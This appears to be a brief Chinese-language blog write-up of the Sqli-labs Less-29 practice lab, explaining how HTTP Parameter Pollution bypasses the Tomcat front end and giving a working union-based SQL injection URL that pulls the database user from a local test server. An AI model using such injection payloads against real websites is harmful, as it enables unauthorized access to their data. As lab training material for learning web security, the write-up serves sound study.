Sqli-labs less 29

Less-29

首先先看下tomcat中的index.jsp文件

Sqli-labs less 29

在apache的index.php中，sql语句为

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

因此我们根据HPP的原理，我们直接payload：

http://127.0.0.1:8080/sqli-labs/Less-29/index.jsp?id=1&id=-2%27union%20select%201,user(),3--+

Sqli-labs less 29

至于如何注入到其他的内容，只需要自己构造union后面的sql语句即可。

相关文章：

猜你喜欢

相关资源

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode